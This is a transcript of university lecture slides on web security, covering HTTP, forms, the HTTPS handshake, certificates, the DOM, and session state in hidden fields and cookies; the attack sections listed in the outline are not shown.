csc 466/566 computer security 22 : web securitycollberg/teaching/466... · http over secure socket...
TRANSCRIPT
![Page 1: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/1.jpg)
CSc 466/566
Computer Security
22 : Web SecurityVersion: 2014/12/02 15:30:17
Department of Computer ScienceUniversity of Arizona
Copyright c© 2014 Christian Collberg
Christian Collberg
1/79
![Page 2: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/2.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 Summary
Introduction 2/79
![Page 3: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/3.jpg)
Static Web Content
![Page 4: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/4.jpg)
Static Web Content
HTTP Request✞ ☎
GET / i ndex . html HTTP/1 .1Host : www. s i t e . com✝ ✆
![Page 5: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/5.jpg)
Static Web Content
HTTP Response✞ ☎
HTTP/1 . 1 200 OKSe r v e r : AppacheDate : Mon, 1 6 Apr 2 0 1 2 2 1 : 4 4 : 2 9 GMT
Ex p i r e s : −1Content−Type : t e x t /html ; c h a r s e t=ISO−8859−1
Set−Cookie : . . .Content−Length : 314
<! doctype html><html><body>. . .</body></html>✝ ✆
Introduction 3/79
![Page 6: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/6.jpg)
HTML
![Page 7: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/7.jpg)
HTML
HTTP Request✞ ☎
GET / i ndex . html HTTP/1 .1Host : www. s i t e . com✝ ✆
![Page 8: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/8.jpg)
HTML
HTTP Response✞ ☎
<b>bo ld tex t </b><ul>
< l i > l i s t i tem 1< l i > l i s t i tem 2
</ul><a h r e f=” s i t e . com/ boat . j pg ”>L ink !</a>
< s c r i p t >document . l o c a t i o n = . . .
</ s c r i p t ><img s r c=” boat . j pg ”>✝ ✆
Introduction 4/79
![Page 9: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/9.jpg)
Forms
![Page 10: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/10.jpg)
Forms
www.site.com/register.php
![Page 11: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/11.jpg)
Forms
✞ ☎<html><t i t l e >Re g i s t r a t i o n </ t i t l e >
<HTML><TITLE>Re g i s t r a t i o n </TITLE>
<BODY><FORM ACTION=” r e g i s t e r . php” METHOD=”GET”>
<INPUT TYPE=” t e x t ” NAME=”name”><INPUT TYPE=” t e x t ” NAME=” ema i l ”><INPUT TYPE=” submi t ” VALUE=”Submit”>
</FORM></BODY></HTML>✝ ✆
![Page 12: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/12.jpg)
Forms
HTTP Request✞ ☎
www. s i t e . com/ r e g i s t e r . php ?
name=” A l i c e ”&ema i l=” a l i c e@gma i l . com”
✝ ✆
Introduction 5/79
![Page 13: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/13.jpg)
Confidentiality
HTTP requests and responses are delivered via TCP on port80.
All traffic is in the clear !
MITM attacks.
Introduction 6/79
![Page 14: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/14.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 Summary
HTTPS 7/79
![Page 15: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/15.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
HTTPS 8/79
![Page 16: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/16.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
HTTPS 8/79
![Page 17: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/17.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
HTTPS 8/79
![Page 18: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/18.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
HTTPS 8/79
![Page 19: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/19.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
HTTPS 8/79
![Page 20: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/20.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
HTTPS 8/79
![Page 21: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/21.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
HTTPS 8/79
![Page 22: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/22.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
8 The browser encrypts R with Pchase.com and sends it to chase.com.
HTTPS 8/79
![Page 23: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/23.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
8 The browser encrypts R with Pchase.com and sends it to chase.com.
9 Starting from R , the browser and chase.com generate a sharedsecret key K .
HTTPS 8/79
![Page 24: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/24.jpg)
HTTP over Secure Socket Layer (HTTPS)
1 Alice browses to https://chase.com
2 The browser sends chase.com a list of cryptographic ciphers/hashfunctions it supports.
3 The server selects the strongest ciphers/hash functions theyboth support.
4 chase.com tells the browser of its cryptographic choices.
5 chase.com sends the browser its certificate Certchase.com,containing its public key Pchase.com.
6 The browser verifies the authenticity of Certchase.com.
7 Browser generates a random number R .
8 The browser encrypts R with Pchase.com and sends it to chase.com.
9 Starting from R , the browser and chase.com generate a sharedsecret key K .
10 Subsequent messages M: send EK (M),H(K ||M).
HTTPS 8/79
![Page 28: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/28.jpg)
HTTP over Secure Socket Layer (HTTPS)
Alice chase.com
verisign.com
Let’s use AES,SHA-1!
![Page 33: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/33.jpg)
HTTP over Secure Socket Layer (HTTPS)
Alice chase.com
verisign.com
EK (M),H(K ||M)
HTTPS 9/79
![Page 34: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/34.jpg)
Digital Certificates
A Certificate Authority (CA) is a trusted third party (TTT)who issues a certificate stating that
The Bob who lives on Desolation Row and hasphone number (555) 867-5309 and the emailaddress [email protected] has the public key PB . Thiscertificate is valid until June 11, 2012.
The CA has to digitally sign (with their private key SCA) thiscertificate so that we know that it’s real.
HTTPS 10/79
![Page 35: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/35.jpg)
Extended Validation Digital Certificates
Domain validation only SSL certificates: only minimalverification of the details in the certificate.
A Extended Validation Certificate can only be issued by a CAwho passes an audit, that they vet applications according tostrict criteria.
Same structure as other X.509 public key certificates.
Not stronger encryption.
HTTPS 11/79
![Page 36: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/36.jpg)
Extended Validation Digital Certificates. . .
In 2006, researchers at Stanford University and MicrosoftResearch conducted a usability study of the EV display inInternet Explorer 7. Their paper concluded thatparticipants who received no training in browser securityfeatures did not notice the extended validation indicatorand did not outperform the control group, whereasparticipants who were asked to read the Internet Explorerhelp file were more likely to classify both real and fakesites as legitimate.
Source: http://en.wikipedia.org/wiki/Extended_Validation_Certificate
HTTPS 12/79
![Page 37: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/37.jpg)
Certificate Hierarchy
Certificates are signed by certificates higher in acertificate hierarchy .
The root certificate is self-signed .
Chain of Trust — Similar to the Trusted Platform Module’strusted boot.
HTTPS 13/79
![Page 38: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/38.jpg)
Checking the Validity of a Certificate
Is the certificate signed by a known trusted CA (pre-installedin the browser)?
Has the certificate expired?
Is the certificate revoked?1 Extract the revocation cite URL from the certificate.2 Get the certificate revocation list.3 Is the list signed by the CA?4 Is this certificate serial number on the list?
HTTPS 14/79
![Page 39: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/39.jpg)
In-Class Exercise: Goodrich & Tamassia C-7.8
Suppose a web client and web server for a popular shoppingweb site have performed a key exchange so that they are nowsharing a secret session key.
Describe a secure method for the web client to then navigatearound various pages of the shopping site, optionally placingthings into a shopping cart.
Your solution is allowed to use one-way hash functions andpseudo-random number generators, but it cannot use HTTPS,so it does not need to achieve condentiality.
Your solution should be resistant to HTTP session hijackingeven from someone who can sniff all the packets.
HTTPS 15/79
![Page 40: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/40.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 Summary
Dynamic Content 16/79
![Page 41: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/41.jpg)
Dynamic Content
Plain html pages are static .
Dynamic content can change, even without reloading thepage.
Client-side scripts are included in web pages to providedynamic content.
Web pages are represented internally in the browser asDOM trees (Document Object Model ).
Scripts can manipulate the DOM tree.
Most scripts are written in JavaScript .
Dynamic Content 17/79
![Page 42: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/42.jpg)
DOM Tree Example
✞ ☎
<html><head>
< t i t l e >The document</ t i t l e ></head><body>
<d iv>Data</d iv><ul>
< l i >Warning</ l i >< l i ></ l i >
</ul><d iv>Top Sec r e t !</ d iv>
</body></html>✝ ✆
Source: http://javascript.info/tutorial/dom-nodes
Dynamic Content 18/79
![Page 43: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/43.jpg)
DOM Tree Example. . .
HTML
HEAD
TITLE
The document
BODY
DIV
Data
UL
LI
Warning
LI
DIV
Top Secret!
Dynamic Content 19/79
![Page 44: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/44.jpg)
JavaScript
JavaScript code can be included within HTML documents:✞ ☎
< s c r i p t type=” t e x t / j a v a s c r i p t ”>f u n c t i o n h e l l o ( ) {
a l e r t ( ” He l l o wor ld ! ” ) ;}</ s c r i p t>✝ ✆
JavaScript functions can be invoked as a result of clicks, etc.:✞ ☎
<img s r c=” . . . ”onMouseOver=” j a v a s c r i p t : h e l l o ( ) ”>
✝ ✆
Dynamic Content 20/79
![Page 45: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/45.jpg)
DOM Tree Traversal
DOM tree node properties:
name description
firstChild, lastChild start/end of this node’s list ofchildren
childNodes array of all this node’s children
nextSibling, previousSibling neighboring nodes with thesame parent
parentNode the element that contains thisnode
Thus, you can traverse the DOM tree from within JavaScript:✞ ☎
window . document . ch i l dNodes [ 0 ] . ch i l dNodes [ 1 ] .ch i l dNodes [ 4 ]
✝ ✆
Dynamic Content 21/79
![Page 46: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/46.jpg)
Sessions
HTTP is a state-less protocol:
every time a browser asks for a page is a new event to theserver;the server keeps no information (automatically) between pageloads.
A session is extra information stored about a visitor betweeninteractions.
Three methods to keep track of sessions:1 Hidden form fields ,2 Client-side cookies ,3 Server-side session .
We must protect against session hijacking — an attackergetting hold of a user’s session information and impersonatinghim to the server.
Dynamic Content 22/79
![Page 47: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/47.jpg)
HTTP is Stateless
www.site.com
Dynamic Content 23/79
![Page 48: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/48.jpg)
HTTP is Stateless
www.site.com
Hi, I’m Alice!
Dynamic Content 23/79
![Page 49: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/49.jpg)
HTTP is Stateless
www.site.com
Hi, Alice!
Dynamic Content 23/79
![Page 50: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/50.jpg)
HTTP is Stateless
www.site.com
Hi, its Alice again!
Dynamic Content 23/79
![Page 51: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/51.jpg)
HTTP is Stateless
www.site.com
Who are you?
Dynamic Content 23/79
![Page 52: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/52.jpg)
HTTP is Stateless
fields
www.site.com
Store state here, or here, or here!
client−sidecookies
server−sidesessions
Hidden form
Dynamic Content 23/79
![Page 53: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/53.jpg)
HTTP is Stateless
www.site.com
Dynamic Content 23/79
![Page 54: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/54.jpg)
Sessions Using Hidden Form Fields
Any information that needs to survive between interactions isstored in the browser in hidden fields in the HTML.
The information is sent back to the server in POST or GETrequests.
✞ ☎
<HTML><BODY><FORM ACTION=” ht tp ://www. v i c t o r i a s s e c r e t . com/buy . j s p ”
METHOD=” get ”><INPUT TYPE=” h idden ” NAME=”name” VALUE=” A l i c e ”><INPUT TYPE=” h idden ” NAME=” he i gh t ” VALUE=”170cm”><INPUT TYPE=” h idden ” NAME=”weight ” VALUE=”53kg”><INPUT TYPE=” submit ”></FORM></BODY></HTML>✝ ✆
HTTP is sent in cleartext — susceptible to MITM attack.
Dynamic Content 24/79
![Page 55: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/55.jpg)
Sessions Using Hidden Form Fields. . .
![Page 56: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/56.jpg)
Sessions Using Hidden Form Fields. . .
name=Alice&height=170cm&weight=53kg
![Page 57: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/57.jpg)
Sessions Using Hidden Form Fields. . .
name=Alice&height=170cm&weight=53kg
<INPUT TYPE=”hidden ” NAME=”name” VALUE=” A l i c e ”>
<INPUT TYPE=”hidden ” NAME=” he i gh t ” VALUE=”170cm”>
<INPUT TYPE=”hidden ” NAME=”we ight ” VALUE=”53kg”>
![Page 58: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/58.jpg)
Sessions Using Hidden Form Fields. . .
Eve
name=Alice&height=170cm&weight=53kg
<INPUT TYPE=”hidden ” NAME=”name” VALUE=” A l i c e ”>
<INPUT TYPE=”hidden ” NAME=” he i gh t ” VALUE=”170cm”>
<INPUT TYPE=”hidden ” NAME=”we ight ” VALUE=”53kg”>
Use HTTPS instead.
Dynamic Content 25/79
![Page 59: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/59.jpg)
Sessions Using Cookies
A cookie is a piece of data sent to the client by the webserver.
The cookie is stored on the client.
When the user returns to the site, the cookie is sent to theweb server.
cookie✞ ☎”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012domain=. v i c t o r i a s s e c r e t . compath : /send f o r : any type✝ ✆
Dynamic Content 26/79
![Page 60: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/60.jpg)
Sessions Using Cookies
Let’s assume Alice is browsing to http://www.victoriassecret.com.
She fills out a form with her personal data:✞ ☎
<HTML><BODY><FORM ACTION=” ht tp ://www. v i c t o r i a s s e c r e t . com/buy . j s p ”
METHOD=” get ”><INPUT TYPE=” in pu t ” NAME=”name” VALUE=” A l i c e ”><INPUT TYPE=” in pu t ” NAME=” he i gh t ” VALUE=”170cm”><INPUT TYPE=” in pu t ” NAME=”weight ” VALUE=”53kg”><INPUT TYPE=” submit ”></FORM></BODY></HTML>✝ ✆
Dynamic Content 27/79
![Page 61: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/61.jpg)
![Page 62: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/62.jpg)
<INPUT TYPE=” i npu t ” NAME=”name” VALUE=” A l i c e ”>
